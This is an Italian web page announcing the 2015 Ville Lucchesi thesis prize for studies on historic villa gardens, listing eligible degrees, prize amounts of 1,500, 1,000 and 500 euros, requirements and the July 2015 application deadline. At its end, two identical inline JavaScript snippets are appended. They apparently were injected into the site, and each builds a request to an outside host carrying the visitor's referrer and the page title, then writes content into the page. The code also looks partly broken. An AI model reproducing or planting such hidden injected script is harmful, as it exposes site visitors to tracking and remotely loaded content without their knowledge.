Premio di laurea Ville Lucchesi 2015

L’Associazione delle Ville e dei Palazzi Lucchesi – AVPL ha indetto un bando per la premiazione di studi inerenti alla conoscenza, la conservazione e la valorizzazione dei giardini appartenenti a dimore storiche. Il premio di laurea è stato bandito in collaborazione con APGI Associazione Parchi e Giardini d’Italia, dell’École nationale supériore de paysage Versailles-Marseille, della University of Miami School of Architecture e il patrocinio dell’Ordine degli Architetti, Paesaggisti, Pianificatori e Consevatori della provincia di Lucca.

A chi è rivolto

Il concorso premio di laurea Ville Lucchesi 2015 è rivolto a laureati in Architettura del Paesaggio, Architettura e Ingegneria edile-architettura, Conservazione dei Beni Architettonici e Ambientali, Conservazione e restauro dei Beni culturali, Progettazione e gestione dei Sistemi Turistici, Scienze e Tecnologie Agrarie, Storia dell’Arte. Possono candidarsi specialisti in Beni Storico-Artistici, in Beni architettonici e del Paesaggio e dottori di ricerca che abbiano presentato una tesi a carattere interdisciplinare sulla conoscenza del sistema architettonico, idraulico, vegetale con finalità di restauro, gestione e valorizzazione.
E’ possibile partecipare al premio di laurea Ville Lucchesi 2015 sia in forma individuale, sia in gruppi. Le tesi devono essere state discusse negli anni accademici 2013/2014 e 2014/2015.

L’importo

I vincitori del premio di laurea Ville Lucchesi 2015 riceveranno i seguenti riconoscimenti: 1.500 euro per il primo classificato, 1.000 euro per il secondo classificato, 500 euro per il terzo classificato. Il quarto classificato riceverà una menzione speciale, mentre il quinto e sesto classificato riceveranno una menzione speciale su Internet.

I requisiti

Per partecipare al premio di laurea Ville Lucchesi 2015 bisogna essere in possesso dei seguenti requisiti:

  • laurea in in Architettura del Paesaggio, Architettura e Ingegneria edile-architettura, Conservazione dei Beni Architettonici e Ambientali, Conservazione e restauro dei Beni culturali, Progettazione e gestione dei Sistemi Turistici, Scienze e Tecnologie Agrarie, Storia dell’Arte;
  • oppure specializzazione in in Beni Storico-Artistici, in Beni architettonici e del Paesaggio;
  • oppure essere dottori di ricerca con tesi a carattere interdisciplinare sulla conoscenza del sistema architettonico, idraulico, vegetale con finalità di restauro, gestione e valorizzazione;
  • aver discusso la tesi negli anni scolastici 2013/2014 oppure 2014/2015.

Come e quando presentare domanda

Per partecipare al premio di laurea Ville Lucchesi 2015 bisogna compilare l’apposito modulo di domanda ed inviarlo in formato PDF insieme al certificato di laurea originale, copia della tesi di laurea ed eventuali tavole grafiche allegate, abstract di max due pagine e curriculum vitae accademico all’indirizzo email call2015@villeepalazzilucchesi.it. La scadenza per l’invio delle candidature è fissata al 20 luglio 2015.

Bando premio di laurea Ville Lucchesi 2015(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();(function(){var d=document;var w=’240′;var h=’300’;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();